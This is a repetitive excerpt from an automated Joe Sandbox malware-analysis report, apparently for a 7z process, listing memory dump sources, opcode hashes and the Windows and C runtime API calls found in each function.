                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: bfe4f0f55ee913568f211c4fbf308b9aee0fbd2fe155706c5642a99402e277d4
                                                                                                                                                                                                                                                  • Instruction ID: 537f466c8f43c2cb1e932f099f21950d3b4ccff7401b281429e30ea1d8e304ad
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bfe4f0f55ee913568f211c4fbf308b9aee0fbd2fe155706c5642a99402e277d4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B501D22371694497DA24EF26D9102AD2320F7C2FB4B588321AF2D17791DF24D852C310
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009B7DA9
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009B7DB2
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009B7DE5
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009B7DF2
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009B7DFB
                                                                                                                                                                                                                                                    • Part of subcall function 009994A8: free.MSVCRT ref: 009994DB
                                                                                                                                                                                                                                                    • Part of subcall function 009994A8: free.MSVCRT ref: 009994E3
                                                                                                                                                                                                                                                    • Part of subcall function 009994A8: free.MSVCRT ref: 009994F0
                                                                                                                                                                                                                                                    • Part of subcall function 009994A8: free.MSVCRT ref: 0099951C
                                                                                                                                                                                                                                                    • Part of subcall function 009994A8: free.MSVCRT ref: 00999525
                                                                                                                                                                                                                                                    • Part of subcall function 009994A8: free.MSVCRT ref: 0099952D
                                                                                                                                                                                                                                                    • Part of subcall function 009994A8: free.MSVCRT ref: 0099953A
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: 782f6fd7dc41bf8ca513220e7cc76460a379d2f1bbd67af93ff481f02cf2e1fb
                                                                                                                                                                                                                                                  • Instruction ID: 67da17081f85e1d57493f8ca39534918c83f103ea39395a8cd7819cc3f126ae3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 782f6fd7dc41bf8ca513220e7cc76460a379d2f1bbd67af93ff481f02cf2e1fb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 74016223B1695089DA16AF2ADD513BC6324FBC9FF4F994221EF1D4B365EE25C842C390
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 00993877
                                                                                                                                                                                                                                                    • Part of subcall function 00990BBC: free.MSVCRT ref: 00990BCC
                                                                                                                                                                                                                                                    • Part of subcall function 00990BBC: free.MSVCRT ref: 00990BD5
                                                                                                                                                                                                                                                    • Part of subcall function 00990BBC: free.MSVCRT ref: 00990C00
                                                                                                                                                                                                                                                    • Part of subcall function 00990BBC: free.MSVCRT ref: 00990C08
                                                                                                                                                                                                                                                    • Part of subcall function 00991474: free.MSVCRT ref: 009914A6
                                                                                                                                                                                                                                                    • Part of subcall function 00991474: free.MSVCRT ref: 009914AF
                                                                                                                                                                                                                                                    • Part of subcall function 00991474: free.MSVCRT ref: 009914B8
                                                                                                                                                                                                                                                    • Part of subcall function 00991474: free.MSVCRT ref: 009914C0
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 00993892
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 0099389B
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009938C6
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009938CE
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: 18ccfc5564c15e61a23e9604fa5b251626cea37ac211422c809096770ce5a63d
                                                                                                                                                                                                                                                  • Instruction ID: 3abed44730526d3be09cb5af5a818a91bad5392870762979beb9ed17a821a2f1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 18ccfc5564c15e61a23e9604fa5b251626cea37ac211422c809096770ce5a63d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3DF01D23B268509ACE15EF2BDD5126C2324FBC5F947498161AF2D4B751DF50C962C350
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: c213d67050506c93901002ddd1084c0dd65243c9eb9d617befeb87ee319482a8
                                                                                                                                                                                                                                                  • Instruction ID: 6fbc938eac05c7fb916837bfd492ac856763c7aa6c53271b3c27963ee03f16d7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c213d67050506c93901002ddd1084c0dd65243c9eb9d617befeb87ee319482a8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E4F090537269948DCA20EF2BDD912682324BF96BE875C8171FF1E07754EE20C852C310
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: 99aac3ebba39b973ad56ba9f7cc64fb651a8512a5e29eea15e4582f1b066fd79
                                                                                                                                                                                                                                                  • Instruction ID: 417e23a883a84407140b00ecf1769c2315e70408efb8b98148ab58aaa741567a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 99aac3ebba39b973ad56ba9f7cc64fb651a8512a5e29eea15e4582f1b066fd79
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 31F0302372594489CB25BF37DD512686324FBD5FD47598161AF2D4B399DE24C842C350
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: f7456f4712a6592163503973d257ef0995b2ed4d21bfa0f5baa221aafdf9fe8c
                                                                                                                                                                                                                                                  • Instruction ID: 629869578a006ae2ec2d4819f67a1193afb0690ce9eb2bc2fe388539a3ee8f28
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f7456f4712a6592163503973d257ef0995b2ed4d21bfa0f5baa221aafdf9fe8c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 66F06D937129848ECB10EF2BDC912682324AF95BA9B5C8171AF2D07755DE20C892C350
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009B76AF
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009B76BB
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009B76C7
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009B76D3
                                                                                                                                                                                                                                                    • Part of subcall function 009BB310: free.MSVCRT ref: 009BB335
                                                                                                                                                                                                                                                    • Part of subcall function 009BB310: free.MSVCRT ref: 009BB342
                                                                                                                                                                                                                                                    • Part of subcall function 009BB310: free.MSVCRT ref: 009BB34E
                                                                                                                                                                                                                                                    • Part of subcall function 009BB310: free.MSVCRT ref: 009BB358
                                                                                                                                                                                                                                                    • Part of subcall function 009BB310: free.MSVCRT ref: 009BB362
                                                                                                                                                                                                                                                    • Part of subcall function 009BB310: free.MSVCRT ref: 009BB36C
                                                                                                                                                                                                                                                    • Part of subcall function 009BB310: free.MSVCRT ref: 009BB376
                                                                                                                                                                                                                                                    • Part of subcall function 009BB310: free.MSVCRT ref: 009BB380
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009B76E4
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: 80021553301d9a40d6bbe7854cc860826636cb7fafc5824219d75b22b7ddba10
                                                                                                                                                                                                                                                  • Instruction ID: 1b8686694d99e9cc0d2079fe6dc619ee7dc96856e38f590b25ee680c787fb00a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 80021553301d9a40d6bbe7854cc860826636cb7fafc5824219d75b22b7ddba10
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8E0C93322598081CA50EF76C8962EC2360F7D9B68F584271AA2E8E366DE10C983C360
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExceptionThrow$memmove
                                                                                                                                                                                                                                                  • String ID: Internal collision in update action set
                                                                                                                                                                                                                                                  • API String ID: 265668421-2378581463
                                                                                                                                                                                                                                                  • Opcode ID: 2489d0cffbcfc2a2b50f9be8098032778b6c83d9b82680e9d68b7dd3d3502d6c
                                                                                                                                                                                                                                                  • Instruction ID: d31c45fdbfb60db8433becddbf8c63474c1991c9239833857fd498d92a69878c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2489d0cffbcfc2a2b50f9be8098032778b6c83d9b82680e9d68b7dd3d3502d6c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 864124323086858ADB34DB19E5587AF7B91F3C57ACF048215EB8903B69EB78D545CB00
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID: =
                                                                                                                                                                                                                                                  • API String ID: 1294909896-2525689732
                                                                                                                                                                                                                                                  • Opcode ID: 40c11fba967689670f12ed8931cb4eba44630f327dd0b6864abb2cd98b0bc6cc
                                                                                                                                                                                                                                                  • Instruction ID: 07010381d42e4db5cd141f41aeb72d5040fe222eafdb9a490e2b1625c0105916
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 40c11fba967689670f12ed8931cb4eba44630f327dd0b6864abb2cd98b0bc6cc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0031D763329A80D6CB10DF55E58079EB720F7D2760F949222FB8E43A69DF78C945DB00
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009A6E91
                                                                                                                                                                                                                                                    • Part of subcall function 00973518: free.MSVCRT ref: 00973551
                                                                                                                                                                                                                                                    • Part of subcall function 00973314: memmove.MSVCRT ref: 00973339
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009A6E83
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$memmove
                                                                                                                                                                                                                                                  • String ID: exe
                                                                                                                                                                                                                                                  • API String ID: 1534225298-1801697008
                                                                                                                                                                                                                                                  • Opcode ID: 76770eb1b0aff3fcbaddab3083a3c2637205f7744bad9aa1b7e03b28f3d0466f
                                                                                                                                                                                                                                                  • Instruction ID: afd58867e1af44ea46ebd3a1c4a0e6dfd947969a0e3d75798a3a736e7341c394
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 76770eb1b0aff3fcbaddab3083a3c2637205f7744bad9aa1b7e03b28f3d0466f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 05318923304941A6CE34EB25E88029EBB30F7C57D4F849212FB9E47679DF28D64AC740
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$ByteStringmemmove
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 400576877-0
                                                                                                                                                                                                                                                  • Opcode ID: 5637341bacbf58961c244732aae0ca4a62e7964f71b8c23c3f8f40cbc07f99e7
                                                                                                                                                                                                                                                  • Instruction ID: eb39beb09a0cc1b607c84e1dadd4d968f27fec9707e8ff72ba41ec0d6b648b31
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5637341bacbf58961c244732aae0ca4a62e7964f71b8c23c3f8f40cbc07f99e7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D421B523314B9092EF259F5DE9503697368FB887A0F484529AFAE0B7A4DF3CC856C310
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$wcscmp
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4021281200-0
                                                                                                                                                                                                                                                  • Opcode ID: 1721c6616b74a4c47d99cfe980b2e26b6a86647a23934d96b3aa9ed1d32fc9d1
                                                                                                                                                                                                                                                  • Instruction ID: 491974aab33c94666b2a7f3caf68cd1b5d4127df1a7c91803235b1f6adb0c27b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1721c6616b74a4c47d99cfe980b2e26b6a86647a23934d96b3aa9ed1d32fc9d1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5921B07721474096DF20AF2EE8403697761E7C9BE4F549225AE6A47794EF38C586CB00
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID: Unsupported charset:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-616772432
                                                                                                                                                                                                                                                  • Opcode ID: 9e42c2d2b4e1f7d5b703db533c77dc73d7d9a80e6522a8e966b0da96d7856300
                                                                                                                                                                                                                                                  • Instruction ID: c7b06a0fc599a2a855d9d663e41c3149b374e181ad093e9346921396ffca99b1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9e42c2d2b4e1f7d5b703db533c77dc73d7d9a80e6522a8e966b0da96d7856300
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4E21746360460092DB20DB18E8A079D7721F7D47E8F948222EAAD577B5DF68C986C750
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00977D4C: GetFileAttributesW.KERNELBASE ref: 00977D6E
                                                                                                                                                                                                                                                    • Part of subcall function 00977D4C: GetFileAttributesW.KERNEL32 ref: 00977DA5
                                                                                                                                                                                                                                                    • Part of subcall function 00977D4C: free.MSVCRT ref: 00977DB2
                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32 ref: 00976D90
                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32 ref: 00976DCA
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 00976DDA
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 00976DE8
                                                                                                                                                                                                                                                    • Part of subcall function 009768A0: SetFileAttributesW.KERNELBASE ref: 009768C7
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$Attributesfree$Delete
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 324319583-0
                                                                                                                                                                                                                                                  • Opcode ID: 9ea681c350cecb0b42c71b1f35ea49690d0665b5843397cde649d2af5f6ea4c4
                                                                                                                                                                                                                                                  • Instruction ID: 3f72188c173b654c1b06bd80af66faf8b0b8ccc86ce52632880589061ba75515
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ea681c350cecb0b42c71b1f35ea49690d0665b5843397cde649d2af5f6ea4c4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 85014433358F0141CE30AF25EC613AD13259BCABB4F9C9721ADBE873E5DE28C9569600
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00982137
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009821BB
                                                                                                                                                                                                                                                    • Part of subcall function 00976618: FormatMessageW.KERNEL32 ref: 00976676
                                                                                                                                                                                                                                                    • Part of subcall function 00976618: LocalFree.KERNEL32 ref: 00976698
                                                                                                                                                                                                                                                    • Part of subcall function 0097362C: memmove.MSVCRT ref: 00973659
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 00982182
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$ErrorFormatFreeLastLocalMessagememmove
                                                                                                                                                                                                                                                  • String ID: :
